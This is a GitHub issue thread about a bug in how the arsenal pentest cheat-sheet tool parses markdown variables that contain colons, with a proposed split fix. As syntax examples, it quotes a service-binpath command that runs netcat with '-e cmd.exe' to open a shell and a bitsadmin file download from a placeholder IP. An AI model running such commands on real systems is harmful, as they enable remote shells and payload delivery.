### ISSUE TITLE
problem with md variable parsing

### ISSUE THREAD

**Issue by jubeaz** [Orange-Cyberdefense/arsenal#70]
Hello,

when setting a variable inside a markdown cheat the variable value is not properly set when it contains a ":" like for a windows path
for example : 
= bitsadmin_path: 'c:\windows\temp'

I guess to correct it the following lines in parse_yaml function of cheat.py have to be changed this way

>>                  varname = line[2:].split(':')[0].strip()
>>                   varval = line[2:].split(':')[1].strip()

>>                    varname = line[2:].split(':',1)[0].strip()
>>                    varval = line[2:].split(':',1)[1].strip()

**Comment by v1k1ngfr** [comment]
Hello,

There are already some cheats that contains ":" like for Windows path, please see examples here : 
```
sc config <service> binpath= "C:\nc.exe -nv 127.0.0.1 4444 -e C:\WINDOWS\System32\cmd.exe"
```

https://github.com/Orange-Cyberdefense/arsenal/blob/master/arsenal/data/cheats/Windows/windows.md

Could you test using the same syntax ?

**Comment by jubeaz** [comment]
Hello,

my problem concern variable parsing in md cheat. For example:  

## Download file with bitsadmin
```
bitsadmin /Transfer myJob http://<ip>/<file|file.txt> <bitsadmin_path>
```

= bitsadmin_path: c:\windows\temp

**Comment by v1k1ngfr** [comment]
ok we will take a look at this bug

**Comment by r3dp0int** [comment]
Have confirmed this is an issue @jubeaz.
It definitely seems to be an issue with using the ":" as the strip() delimiter.
I tried implementing your code suggestion, but it didn't fix it unfortunately.

**Comment by v1k1ngfr** [comment]
Fixed by @r3dp0int
